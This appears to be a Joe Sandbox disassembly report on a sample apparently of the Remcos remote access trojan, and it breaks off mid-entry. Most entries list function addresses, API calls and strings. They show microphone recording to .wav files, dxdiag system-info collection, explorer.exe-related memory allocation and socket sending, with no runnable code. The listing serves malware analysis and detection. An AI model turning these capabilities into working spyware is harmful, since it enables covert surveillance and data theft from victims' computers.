Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: PkGNG
API String ID: 1324828854-263838557
Opcode ID: 0bfd670419a30e70b2122a04c0ff37dc7c92f96e788d8b5757dd12d671b03cbd
Instruction ID: c2ad9366897e527a7c84483f5be554853dc3097bc1455fd29c72216385fc5a9b
Opcode Fuzzy Hash: 0bfd670419a30e70b2122a04c0ff37dc7c92f96e788d8b5757dd12d671b03cbd
Instruction Fuzzy Hash: 2C51D170A44249AFCB10CFA8DC84BEEBBF8EF48304F15452EE955E7291D7709A41CBA5

Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
__fassign.LIBCMT ref: 0044B479
__fassign.LIBCMT ref: 0044B494
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512

Strings

PkGNG, xrefs: 0044B3BE

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: PkGNG
API String ID: 1324828854-263838557
Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9

Function 02147F46 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02148193: __EH_prolog.LIBCMT ref: 02148198

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 02148043
CloseHandle.KERNEL32(00000000), ref: 0214804C
DeleteFileA.KERNEL32(00000000), ref: 0214805B
ShellExecuteEx.SHELL32(0000003C), ref: 0214800F

Part of subcall function 02134D08: send.WS2_32(?,00000000,00000000,00000000), ref: 02134D9D

Strings

@, xrefs: 02147FF1
0VG, xrefs: 0214801C
<, xrefs: 02147FEA
0VG, xrefs: 02148088

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: 0VG$0VG$<$@
API String ID: 1704390241-760889559
Opcode ID: f9acbf50aef6936e57eab006d814cb43dd730a2a7614237435e4bf1f23e36b1b
Instruction ID: ccfe50422ab22272ea23637f99651707a3f92d15da954c391833173300bd7ebe
Opcode Fuzzy Hash: f9acbf50aef6936e57eab006d814cb43dd730a2a7614237435e4bf1f23e36b1b
Instruction Fuzzy Hash: 0A416D31980209AFCB06FB60DC55AED7777BF10311F514169E90A660A0EF752E8ACF91

Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

Sleep.KERNEL32(00000064), ref: 00417521
DeleteFileW.KERNEL32(00000000), ref: 00417555

Strings

\sysinfo.txt, xrefs: 004174A0
open, xrefs: 004174EF
temp, xrefs: 004174A5
dxdiag, xrefs: 004174EA
/t , xrefs: 004174D4

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 26aa2d6b592c5681858e9613525fcc6a24132ca95ae0dead3031473d7fabaff2
Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
Opcode Fuzzy Hash: 26aa2d6b592c5681858e9613525fcc6a24132ca95ae0dead3031473d7fabaff2
Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C

Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\Desktop\ltlbVjClX9.exe), ref: 0040749E

Strings

windir, xrefs: 004073EA
[+] NtAllocateVirtualMemory Success, xrefs: 00407410
[-] NtAllocateVirtualMemory Error, xrefs: 0040743D
PEB: %x, xrefs: 004074AF
explorer.exe, xrefs: 00407450, 0040747B
\explorer.exe, xrefs: 00407400

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
API String ID: 2050909247-4242073005
Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F

Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D50

Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9

waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F

Strings

.wav, xrefs: 00401D69
|MG, xrefs: 00401E08
dMG, xrefs: 00401D81
%Y-%m-%d %H.%M, xrefs: 00401D41

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
API String ID: 3809562944-243156785
Opcode ID: 8277149c4797cba40216663809e66e32391bc884527b25f0f3330f0d28be14dd
Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
Opcode Fuzzy Hash: 8277149c4797cba40216663809e66e32391bc884527b25f0f3330f0d28be14dd
Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E

Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
int.LIBCPMT ref: 00410E81

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 00410EC1
std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
__CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
__Init_thread_footer.LIBCMT ref: 00410F29

Strings

0kG, xrefs: 00410F31
,kG, xrefs: 00410F04

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID: ,kG$0kG
API String ID: 3815856325-2015055088
Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D

Function 02131E50 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02131E60
waveInOpen.WINMM(00472AC0,000000FF,00472AA8,00401D0B,00000000,00000000,00000024), ref: 02131EF6
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 02131F4A
waveInAddBuffer.WINMM(00472A88,00000020), ref: 02131F59
waveInStart.WINMM ref: 02131F65

Strings

PG, xrefs: 02131E8E
|MG, xrefs: 02131F02
dMG, xrefs: 02131E54

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: dMG$|MG$PG
API String ID: 1356121797-532278878
Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
Instruction ID: eaeda6e5c2d33050d37290f08e1f07ed02e38b89eeceae31c46a6dd4ab3f5ef6
Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
Instruction Fuzzy Hash: FB212871644210AFC739AF69EE08A6A7BA6FB94711B00803AE10DD76B0DBF44881CF1C

Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
waveInStart.WINMM ref: 00401CFE

Strings

dMG, xrefs: 00401BED
|MG, xrefs: 00401C9B
PG, xrefs: 00401C27

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: dMG$|MG$PG
API String ID: 1356121797-532278878
Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C

Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476

Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
lstrcpyn.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
Shell_NotifyIcon.SHELL32(00000000,00474B48), ref: 0041D4DD
TranslateMessage.USER32(?), ref: 0041D4E9
DispatchMessageA.USER32(?), ref: 0041D4F3
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500

Strings

Remcos, xrefs: 0041D4B8

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98

Function 0217CFE7 Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
Instruction ID: 9f7649634e95967d534caaa66fccc7f9fd934ce064ce02bfde5e7bf2ba24dd9d
Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
Instruction Fuzzy Hash: 69C1E3B0E8434DAFCF11DFA8E840BADBBB5AF99310F194198E814A7391C7749941CF61

Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69

Function 021753E0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0217847C: GetLastError.KERNEL32(?,0216F987,0216AA5C,0216F987,00474EF8,PkGNG,0216D07C,FF8BC35D,00474EF8,00474EF8), ref: 02178480
Part of subcall function 0217847C: _free.LIBCMT ref: 021784B3
Part of subcall function 0217847C: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784F4
Part of subcall function 0217847C: _abort.LIBCMT ref: 021784FA

_memcmp.LIBVCRUNTIME ref: 0217568A
_free.LIBCMT ref: 021756FB
_free.LIBCMT ref: 02175714
_free.LIBCMT ref: 02175746
_free.LIBCMT ref: 0217574F
_free.LIBCMT ref: 0217575B

Strings

C, xrefs: 02175548

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
Instruction ID: ccdd0017854e1cc1bf65886be52a0e8fdd0972f77ec16b060e1f4f6a84259cef
Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
Instruction Fuzzy Hash: 69B12B75941619EFDB24DF18C884BADB7B6FF88304F5045AAE949A7350E730AE90CF80

Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

_memcmp.LIBVCRUNTIME ref: 00445423
_free.LIBCMT ref: 00445494
_free.LIBCMT ref: 004454AD
_free.LIBCMT ref: 004454DF
_free.LIBCMT ref: 004454E8
_free.LIBCMT ref: 004454F4

Strings

C, xrefs: 004452E1

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44

Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

tcp, xrefs: 00414A73
udp, xrefs: 00414A46

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A

Function 0217AEB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,PkGNG,0217B101,00000001,00000001,00000006), ref: 0217AF0A
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,PkGNG,0217B101,00000001,00000001,00000006), ref: 0217AF90
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0217B08A
__freea.LIBCMT ref: 0217B097

Part of subcall function 0217639E: RtlAllocateHeap.NTDLL(00000000,02165523,?), ref: 021763D0

__freea.LIBCMT ref: 0217B0A0
__freea.LIBCMT ref: 0217B0C5

Strings

PkGNG, xrefs: 0217AEB2

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID: PkGNG
API String ID: 1414292761-263838557
Opcode ID: c5cb214f4a2a3937480b79e8c53344cc3409a60032681fe1a35b0fb183621830
Instruction ID: 3281484974ed7e1ecb3adb5752b219c92893121bc3f7e93cc0f572b9cf1d30e6
Opcode Fuzzy Hash: c5cb214f4a2a3937480b79e8c53344cc3409a60032681fe1a35b0fb183621830
Instruction Fuzzy Hash: 0D51D072680216AFDB258E74CC84EBF77BAEF84758F154628FC24D6180EB34DD50CA60

Function 02141F65 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02141A03: SetLastError.KERNEL32(0000000D,02141F83,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,02141F61), ref: 02141A09

SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,02141F61), ref: 02141F9E
GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,02141F61), ref: 0214200C
SetLastError.KERNEL32(0000000E), ref: 02142030

Part of subcall function 02141F0A: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0214204E,?,00000000,00003000,00000040,00000000), ref: 02141F1A

GetProcessHeap.KERNEL32(00000008,00000040), ref: 02142077
RtlAllocateHeap.NTDLL(00000000), ref: 0214207E
SetLastError.KERNEL32(0000045A), ref: 02142191

Part of subcall function 021422DE: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0214219E), ref: 0214234E
Part of subcall function 021422DE: HeapFree.KERNEL32(00000000), ref: 02142355

Strings

t^F, xrefs: 02141F69

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$Process$AllocAllocateFreeInfoNativeSystemVirtual
String ID: t^F
API String ID: 2227336758-389975521
Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
Instruction ID: 229baf4652593012f141f17295b769756b7187eec59f9486b03a1d332e89f0eb
Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
Instruction Fuzzy Hash: 75619EB0680211AFD7249F65CD80B6A7BAABF44705F044129FE0D8B681EFB4E8C5CB95

Function 00411CFE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2

SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
SetLastError.KERNEL32(0000000E), ref: 00411DC9

Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3

GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
RtlAllocateHeap.KERNEL32(00000000), ref: 00411E17
SetLastError.KERNEL32(0000045A), ref: 00411F2A

Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE

Strings

t^F, xrefs: 00411D02

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$Process$AllocAllocateFreeInfoNativeSystemVirtual
String ID: t^F
API String ID: 2227336758-389975521
Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9

Function 0214B2AE Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0214B3A3
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0214B3DF
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 0214B3F5
SetEvent.KERNEL32 ref: 0214B480
WaitForSingleObject.KERNEL32(000001F4), ref: 0214B491
CloseHandle.KERNEL32 ref: 0214B4A1

Strings

open ", xrefs: 0214B337

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
String ID: open "
API String ID: 1811012380-3219617982
Opcode ID: 9ee2812955ecef10968723877d6fcbcd3793f0fcc928faf59019219cd1465a0f
Instruction ID: b9224cd1ee69ff5dabc16635806db5a671d8b7c726fba968e2167a7333ce89d2
Opcode Fuzzy Hash: 9ee2812955ecef10968723877d6fcbcd3793f0fcc928faf59019219cd1465a0f
Instruction Fuzzy Hash: CC51B1B16C83046ED315BB34DC91EBF379EEB94758F50042AB54A520A1EF708E09CA6A

Function 02134B2F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 144networkCOMMON

Download Yara Rule

APIs

